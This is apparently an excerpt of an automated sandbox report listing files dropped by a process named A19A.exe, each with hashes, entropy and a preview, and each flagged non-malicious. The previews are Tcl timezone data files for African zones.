                                                                                                                                                                                                                                                                                                                                SHA1:EF391BF1C3E1DEC08D8158B82B2FB0ED3E69866E
                                                                                                                                                                                                                                                                                                                                SHA-256:A6CFC4359B7E2D650B1851D805FF5CD4562D0D1253793EA0978819B9A2FCC0E2
                                                                                                                                                                                                                                                                                                                                SHA-512:6BFF03EE8973E2204181967987930EECDD39789DB353DB2EFC786027A8013CFF4835FAB9E3F0AF935D2A2D49CCEBE565FD481BA230EDF4D22A7848D4781C877C
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Africa/El_Aaiun) {. {-9223372036854775808 -3168 0 LMT}. {-1136070432 -3600 0 -01}. {198291600 0 0 +00}. {199756800 3600 1 +00}. {207702000 0 0 +00}. {231292800 3600 1 +00}. {244249200 0 0 +00}. {265507200 3600 1 +00}. {271033200 0 0 +00}. {1212278400 3600 1 +00}. {1220223600 0 0 +00}. {1243814400 3600 1 +00}. {1250809200 0 0 +00}. {1272758400 3600 1 +00}. {1281222000 0 0 +00}. {1301788800 3600 1 +00}. {1312066800 0 0 +00}. {1335664800 3600 1 +00}. {1342749600 0 0 +00}. {1345428000 3600 1 +00}. {1348970400 0 0 +00}. {1367114400 3600 1 +00}. {1373162400 0 0 +00}. {1376100000 3600 1 +00}. {1382839200 0 0 +00}. {1396144800 3600 1 +00}. {1403920800 0 0 +00}. {1406944800 3600 1 +00}. {1414288800 0 0 +00}. {1427594400 3600 1 +00}. {1434247200 0 0 +00}. {1437271200 3600 1 +00}. {1445738400 0 0 +00}. {1459044000 3600 1 +00}. {146509200
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):181
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.817633094200984
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqss1kvFVAIgNGE4Rvt2Dcu5sp4DcsP:SlSWB9IZaM3y7sYFVAIgNT4tt2Dk4DBP
                                                                                                                                                                                                                                                                                                                                MD5:035B36DF91F67179C8696158F58D0CE8
                                                                                                                                                                                                                                                                                                                                SHA1:E43BFF33090324110048AC19CBA16C4ED8D8B3FE
                                                                                                                                                                                                                                                                                                                                SHA-256:3101942D9F3B2E852C1D1EA7ED85826AB9EA0F8953B9A0E6BAC32818A2EC9EDD
                                                                                                                                                                                                                                                                                                                                SHA-512:A7B52154C6085E5D234D6D658BA48D2C8EC093A429C3907BE7D16654F6EE9EBE8E3100187650956E5164B18340AB0C0979C1F4FA90EFE0CC423FBA5F14F45215
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Africa/Abidjan)]} {. LoadTimeZoneFile Africa/Abidjan.}.set TZData(:Africa/Freetown) $TZData(:Africa/Abidjan).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):178
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.8512443534123255
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqsfKGyVAIgNGEjKKW62DcHK0o/4DcfKu:SlSWB9IZaM3y7fYVAIgNTj5W62DAV+4G
                                                                                                                                                                                                                                                                                                                                MD5:BA2C7443CFCB3E29DB84FEC16B3B3843
                                                                                                                                                                                                                                                                                                                                SHA1:2BA7D68C48A79000B1C27588A20A751AA04C5779
                                                                                                                                                                                                                                                                                                                                SHA-256:28C1453496C2604AA5C42A88A060157BDFE22F28EDD1FBC7CC63B02324ED8445
                                                                                                                                                                                                                                                                                                                                SHA-512:B275ABAADA7352D303EFEAD66D897BE3099A33B80EA849F9F1D98D522AA9A3DC44E1D979C0ABF2D7886BACF2F86D25837C971ECE6B2AF731BE2EE0363939CBDE
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Africa/Maputo)]} {. LoadTimeZoneFile Africa/Maputo.}.set TZData(:Africa/Gaborone) $TZData(:Africa/Maputo).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):176
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.835896095919456
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqsfKGyVAIgNGEjKKW62Dc0B5h4DcfKu:SlSWB9IZaM3y7fYVAIgNTj5W62Dlfh4G
                                                                                                                                                                                                                                                                                                                                MD5:59137CFDB8E4B48599FB417E0D8A4A70
                                                                                                                                                                                                                                                                                                                                SHA1:F13F9932C0445911E395377FB51B859E4F72862A
                                                                                                                                                                                                                                                                                                                                SHA-256:E633C6B619782DA7C21D548E06E6C46A845033936346506EA0F2D4CCCDA46028
                                                                                                                                                                                                                                                                                                                                SHA-512:2DCEB9A9FA59512ADCDE4946F055718A8C8236A912F6D521087FC348D52FFF462B5712633FDA5505876C500F5FD472381B3AC90CF1AEDF0C96EA08E0A0D3B7BA
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Africa/Maputo)]} {. LoadTimeZoneFile Africa/Maputo.}.set TZData(:Africa/Harare) $TZData(:Africa/Maputo).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):298
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.638948195674004
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:SlSWB9X52DWbAm2OHePP1mXs0//HF20706VcF206KsF:MBp52DWkmdHePP1mcUvFxJVcFEKsF
                                                                                                                                                                                                                                                                                                                                MD5:256740512DCB35B4743D05CC24C636DB
                                                                                                                                                                                                                                                                                                                                SHA1:1FD418712B3D7191549BC0808CF180A682AF7FC1
                                                                                                                                                                                                                                                                                                                                SHA-256:768E9B2D9BE96295C35120414522FA6DD3EDA4500FE86B6D398AD452CAF6FA4B
                                                                                                                                                                                                                                                                                                                                SHA-512:DCFF6C02D1328297BE24E0A640F5823BFD23BDE67047671AC18EB0B1F450C717E273B27A48857F54A18D6877AB8132AAED94B2D87D2F962DA43FE473FC3DDC94
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Africa/Johannesburg) {. {-9223372036854775808 6720 0 LMT}. {-2458173120 5400 0 SAST}. {-2109288600 7200 0 SAST}. {-860976000 10800 1 SAST}. {-845254800 7200 0 SAST}. {-829526400 10800 1 SAST}. {-813805200 7200 0 SAST}.}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1059
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.9545766161038602
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:cQresZkn0Vb0iluy8pLXeKXhCvN9U0TlW50qCPR8jYJRFp0Q8SdAri/8+u8Wb2:5on010ilux1XeKXhCvN9U0TMGqCp8jYH
                                                                                                                                                                                                                                                                                                                                MD5:79FCA072C6AABA65FB2DC83F33BFA17E
                                                                                                                                                                                                                                                                                                                                SHA1:AC86AA9B0EAACAB1E4FDB14AECD8D884F8329A5A
                                                                                                                                                                                                                                                                                                                                SHA-256:C084565CC6C217147C00DCA7D885AC917CFC8AF4A33CBA146F28586AD6F9832C
                                                                                                                                                                                                                                                                                                                                SHA-512:9F19DEA8E21CE3D3DCA0AFC5588203DBB6F5A13BBE10CFDA0CEBE4A417384B85DB3BFFC48687EF7AD27268715FC154E235C106EC91875BA646C6759D285F1027
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Africa/Juba) {. {-9223372036854775808 7588 0 LMT}. {-1230775588 7200 0 CAT}. {10360800 10800 1 CAST}. {24786000 7200 0 CAT}. {41810400 10800 1 CAST}. {56322000 7200 0 CAT}. {73432800 10800 1 CAST}. {87944400 7200 0 CAT}. {104882400 10800 1 CAST}. {119480400 7200 0 CAT}. {136332000 10800 1 CAST}. {151016400 7200 0 CAT}. {167781600 10800 1 CAST}. {182552400 7200 0 CAT}. {199231200 10800 1 CAST}. {214174800 7200 0 CAT}. {230680800 10800 1 CAST}. {245710800 7200 0 CAT}. {262735200 10800 1 CAST}. {277246800 7200 0 CAT}. {294184800 10800 1 CAST}. {308782800 7200 0 CAT}. {325634400 10800 1 CAST}. {340405200 7200 0 CAT}. {357084000 10800 1 CAST}. {371941200 7200 0 CAT}. {388533600 10800 1 CAST}. {403477200 7200 0 CAT}. {419983200 10800 1 CAST}. {435013200 7200 0 CAT}. {452037600 10800 1 CAST}. {466635600 7200 0 CAT}. {483487200 10800 1 CAST
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):180
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.787605387034664
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqsVVMMvwVAIgNGExVMSt2DcJEl2DcVVMMv:SlSWB9IZaM3y7VcVAIgNTxL2DIEl2Dkr
                                                                                                                                                                                                                                                                                                                                MD5:8CF1CA04CD5FC03D3D96DC49E98D42D4
                                                                                                                                                                                                                                                                                                                                SHA1:4D326475E9216089C872D5716C54DEB94590FCDE
                                                                                                                                                                                                                                                                                                                                SHA-256:A166E17E3A4AB7C5B2425A17F905484EBFDBA971F88A221155BCA1EC5D28EA96
                                                                                                                                                                                                                                                                                                                                SHA-512:1301B9469ED396198A2B87CBA254C66B148036C0117D7D4A8286CB8729296AD735DF16581AEF0715CEE24213E91970F181824F3A64BCF91435FDAD85DCD78C84
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Africa/Nairobi)]} {. LoadTimeZoneFile Africa/Nairobi.}.set TZData(:Africa/Kampala) $TZData(:Africa/Nairobi).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1091
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.9616554773567083
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:cQWe9hXn0Vb0iluy8pLXeKXhCvN9U0TlW50qCPR8jYJRFp0Q8SdAri/8+u8WbVgM:5vn010ilux1XeKXhCvN9U0TMGqCp8jYs
                                                                                                                                                                                                                                                                                                                                MD5:A00B0C499DE60158C9990CFE9628FEA4
                                                                                                                                                                                                                                                                                                                                SHA1:44B768C63E170331396B4B81ABF0E3EDD8B0D864
                                                                                                                                                                                                                                                                                                                                SHA-256:FCFF440D525F3493447C0ACFE32BB1E8BCDF3F1A20ADC3E0F5D2B245E2DB10E9
                                                                                                                                                                                                                                                                                                                                SHA-512:30BF22857AA4C26FC6178C950AB6EAB472F2AC77D2D8EB3A209DCDEF2DDC8312B0AB6DA3428936CA16225ABE652DDB8536D870DB1905027AD7BD7FF245871556
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Africa/Khartoum) {. {-9223372036854775808 7808 0 LMT}. {-1230775808 7200 0 CAT}. {10360800 10800 1 CAST}. {24786000 7200 0 CAT}. {41810400 10800 1 CAST}. {56322000 7200 0 CAT}. {73432800 10800 1 CAST}. {87944400 7200 0 CAT}. {104882400 10800 1 CAST}. {119480400 7200 0 CAT}. {136332000 10800 1 CAST}. {151016400 7200 0 CAT}. {167781600 10800 1 CAST}. {182552400 7200 0 CAT}. {199231200 10800 1 CAST}. {214174800 7200 0 CAT}. {230680800 10800 1 CAST}. {245710800 7200 0 CAT}. {262735200 10800 1 CAST}. {277246800 7200 0 CAT}. {294184800 10800 1 CAST}. {308782800 7200 0 CAT}. {325634400 10800 1 CAST}. {340405200 7200 0 CAT}. {357084000 10800 1 CAST}. {371941200 7200 0 CAT}. {388533600 10800 1 CAST}. {403477200 7200 0 CAT}. {419983200 10800 1 CAST}. {435013200 7200 0 CAT}. {452037600 10800 1 CAST}. {466635600 7200 0 CAT}. {483487200 10800 1
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):176
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.8623059127375585
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqsfKGyVAIgNGEjKKW62DcCJRx+DcfKu:SlSWB9IZaM3y7fYVAIgNTj5W62DRX+Da
                                                                                                                                                                                                                                                                                                                                MD5:32AE0D7A7E7F0DF7AD0054E959A53B09
                                                                                                                                                                                                                                                                                                                                SHA1:AE455C96401EBB1B2BDE5674A71A182D9E12D7BD
                                                                                                                                                                                                                                                                                                                                SHA-256:7273FA039D250CABAE2ACCE926AB483B0BF16B0D77B9C2A7B499B9BDFB9E1CBB
                                                                                                                                                                                                                                                                                                                                SHA-512:DC8E89A75D7212D398A253E6FF3D10AF72B7E14CBC07CA53C6CB01C8CE40FB12375E50AD4291C973C872566F8D875D1E1A2CF0A38F02C91355B957095004563E
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Africa/Maputo)]} {. LoadTimeZoneFile Africa/Maputo.}.set TZData(:Africa/Kigali) $TZData(:Africa/Maputo).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):175
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.816805447465336
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqsGe4FVAIgNGESIRL2DcqQFeDcGev:SlSWB9IZaM3y7V4FVAIgNT9L2DdD4v
                                                                                                                                                                                                                                                                                                                                MD5:90EC372D6C8677249C8C2841432F0FB7
                                                                                                                                                                                                                                                                                                                                SHA1:5D5E549496962420F56897BC01887B09EC863D78
                                                                                                                                                                                                                                                                                                                                SHA-256:56F7CA006294049FA92704EDEAD78669C1E9EABE007C41F722E972BE2FD58A37
                                                                                                                                                                                                                                                                                                                                SHA-512:93FD7C8F5C6527DCCFBF21043AB5EED21862A22DA1FDB3ED7635723060C9252D76541DAD3A76EBF8C581A82A6DBEF2766DD428ACE3A9D6A45954A787B686B1CA
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Africa/Lagos)]} {. LoadTimeZoneFile Africa/Lagos.}.set TZData(:Africa/Kinshasa) $TZData(:Africa/Lagos).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):141
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.965079502032549
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFx52DcGemFFkXGm2OHWTdvUQDWTFWZRYvCn:SlSWB9X52D4mFJm2OHWTdRDWTGRLn
                                                                                                                                                                                                                                                                                                                                MD5:51D7AC832AE95CFDE6098FFA6FA2B1C7
                                                                                                                                                                                                                                                                                                                                SHA1:9DA61FDA03B4EFDA7ACC3F83E8AB9495706CCEF1
                                                                                                                                                                                                                                                                                                                                SHA-256:EEDA5B96968552C12B916B39217005BF773A99CA17996893BC87BCC09966B954
                                                                                                                                                                                                                                                                                                                                SHA-512:128C8D3A0AA7CF4DFAE326253F236058115028474BF122F14AB9461D910A03252FEEB420014CA91ACFBF94DF05FBFCADE98217FC59A86A2581BB68CDC83E88C8
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Africa/Lagos) {. {-9223372036854775808 816 0 LMT}. {-1588464816 3600 0 WAT}.}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):177
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.816649832558406
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqsGe4FVAIgNGESIRL2Dcr7bp4DcGev:SlSWB9IZaM3y7V4FVAIgNT9L2Dgfp4Di
                                                                                                                                                                                                                                                                                                                                MD5:D1387B464CFCFE6CB2E10BA82D4EEE0E
                                                                                                                                                                                                                                                                                                                                SHA1:F672B694551AB4228D4FC938D0CC2DA635EB8878
                                                                                                                                                                                                                                                                                                                                SHA-256:BEE63E4DF9D03D2F5E4100D0FCF4E6D555173083A4470540D4ADC848B788A2FC
                                                                                                                                                                                                                                                                                                                                SHA-512:DEB95AAB852772253B60F83DA9CE5E24144386DFBFB1F1E9A77905511181EC84FD13B00200602D6C276820527206EE0078DDE81CC0F1B1276B8BF4360C2CDB1E
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Africa/Lagos)]} {. LoadTimeZoneFile Africa/Lagos.}.set TZData(:Africa/Libreville) $TZData(:Africa/Lagos).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):177
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.813464796454866
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqss1kvFVAIgNGE4Rvt2Dcih4DcsP:SlSWB9IZaM3y7sYFVAIgNT4tt2DNh4DB
                                                                                                                                                                                                                                                                                                                                MD5:D2AA823E78DD8E0A0C83508B6378DE5D
                                                                                                                                                                                                                                                                                                                                SHA1:C26E03EF84C3C0B6001F0D4471907A94154E6850
                                                                                                                                                                                                                                                                                                                                SHA-256:345F3F9422981CC1591FBC1B5B17A96F2F00F0C191DF23582328D44158041CF0
                                                                                                                                                                                                                                                                                                                                SHA-512:908F8D096DA6A336703E7601D03477CECBCDC8D404C2410C7F419986379A14943BB61B0D92D87160D5F1EF5B229971B2B9D122D2B3F70746CED0D4D6B10D7412
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Africa/Abidjan)]} {. LoadTimeZoneFile Africa/Abidjan.}.set TZData(:Africa/Lome) $TZData(:Africa/Abidjan).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):173
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.807298951345495
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqsGe4FVAIgNGESIRL2DccLtBQDcGev:SlSWB9IZaM3y7V4FVAIgNT9L2DXQD4v
                                                                                                                                                                                                                                                                                                                                MD5:E851465BCA70F325B0B07E782D6A759E
                                                                                                                                                                                                                                                                                                                                SHA1:3B3E0F3FD7AF99F941A3C70A2A2564C9301C8CFB
                                                                                                                                                                                                                                                                                                                                SHA-256:F7E1DCBAE881B199F2E2BF18754E145DDED230518C691E7CB34DAE3C922A6063
                                                                                                                                                                                                                                                                                                                                SHA-512:5F655B45D7A16213CE911EDAD935C1FEE7A947C0F5157CE20712A00B2A12A34AE51D5C05A392D2FF3A0B2DA7787D6C614FF100DDE7788CA01AAE21F10DD1CC3A
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Africa/Lagos)]} {. LoadTimeZoneFile Africa/Lagos.}.set TZData(:Africa/Luanda) $TZData(:Africa/Lagos).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):180
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.893308860167744
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqsfKGyVAIgNGEjKKW62DcfpT0DcfKu:SlSWB9IZaM3y7fYVAIgNTj5W62D8pT0G
                                                                                                                                                                                                                                                                                                                                MD5:CD638B7929FB8C474293D5ECF1FE94D3
                                                                                                                                                                                                                                                                                                                                SHA1:149AD0F3CF8AC1795E84B97CFF5CEB1FD26449C4
                                                                                                                                                                                                                                                                                                                                SHA-256:41D32824F28AE235661EE0C959E0F555C44E3E78604D6D2809BBA2254FD47258
                                                                                                                                                                                                                                                                                                                                SHA-512:D762C49B13961A01526C0DD9D7A55E202448E1B46BA64F701FB2E0ABE0F44B2C3DF743864B9E62DC07FD6CEA7197945CE246C89CDACB1FEC0F924F3ECC46B170
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Africa/Maputo)]} {. LoadTimeZoneFile Africa/Maputo.}.set TZData(:Africa/Lubumbashi) $TZData(:Africa/Maputo).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):176
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.857012096036922
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqsfKGyVAIgNGEjKKW62DcOf+DcfKu:SlSWB9IZaM3y7fYVAIgNTj5W62DkDE/
                                                                                                                                                                                                                                                                                                                                MD5:3769866ADC24DA6F46996E43079C3545
                                                                                                                                                                                                                                                                                                                                SHA1:546FA9C76A1AE5C6763B31FC7214B8A2B18C3C52
                                                                                                                                                                                                                                                                                                                                SHA-256:5BAF390EA1CE95227F586423523377BABD141F0B5D4C31C6641E59C6E29FFAE0
                                                                                                                                                                                                                                                                                                                                SHA-512:DEA8CAB330F6321AD9444DB9FEC58E2CBCC79404B9E5539EABB52DBC9C3AC01BA1E8A3E1EC32906F02E4E4744271D84B626A5C32A8CD8B22210C42DD0E774A9C
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Africa/Maputo)]} {. LoadTimeZoneFile Africa/Maputo.}.set TZData(:Africa/Lusaka) $TZData(:Africa/Maputo).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):173
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.807416212132411
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqsGe4FVAIgNGESIRL2Dcn2DcGev:SlSWB9IZaM3y7V4FVAIgNT9L2D42D4v
                                                                                                                                                                                                                                                                                                                                MD5:37C13E1D11C817BA70DDC84E768F8891
                                                                                                                                                                                                                                                                                                                                SHA1:0765A45CC37EB71F4A5D2B8D3359AEE554C647FF
                                                                                                                                                                                                                                                                                                                                SHA-256:8F4F0E1C85A33E80BF7C04CF7E0574A1D829141CC949D2E38BDCC174337C5BAE
                                                                                                                                                                                                                                                                                                                                SHA-512:1E31BBA68E85A8603FBDD27DA68382CBC6B0E1AB0763E86516D3EFD15CFF106DE02812756F504AEE799BF6742423DF5732352D488B3F05B889BE5E48594F558D
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Africa/Lagos)]} {. LoadTimeZoneFile Africa/Lagos.}.set TZData(:Africa/Malabo) $TZData(:Africa/Lagos).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):143
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.906945970372021
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFx52DcfKUXGm2OHoVvXdSF2iv:SlSWB9X52DESm2OHoVPdM
                                                                                                                                                                                                                                                                                                                                MD5:5497C01E507E7C392944946FCD984852
                                                                                                                                                                                                                                                                                                                                SHA1:4C3FD215E931CE36FF095DD9D23165340D6EECFE
                                                                                                                                                                                                                                                                                                                                SHA-256:C87A6E7B3B84CFFA4856C4B6C37C5C8BA5BBB339BDDCD9D2FD34CF17E5553F5D
                                                                                                                                                                                                                                                                                                                                SHA-512:83A2AA0ED1EB22056FFD3A847FB63DD09302DA213FE3AB660C41229795012035B5EA64A3236D3871285A8E271458C2DA6FCD599E5747F2F842E742C11222671A
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Africa/Maputo) {. {-9223372036854775808 7820 0 LMT}. {-2109291020 7200 0 CAT}.}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):194
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.91873415322653
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:SlSWB9IZaM3y7HbsvFVAIgNTzbDJL2DZQs+DWbBn:MBaIMaHw4NHnJL2DZiDWt
                                                                                                                                                                                                                                                                                                                                MD5:71A4197C8062BBFCCC62DCEFA87A25F9
                                                                                                                                                                                                                                                                                                                                SHA1:7490FAA5A0F5F20F456E71CBF51AA6DEB1F1ACC8
                                                                                                                                                                                                                                                                                                                                SHA-256:4B33414E2B59E07028E9742FA4AE34D28C08FD074DDC6084EDB1DD179198B3C1
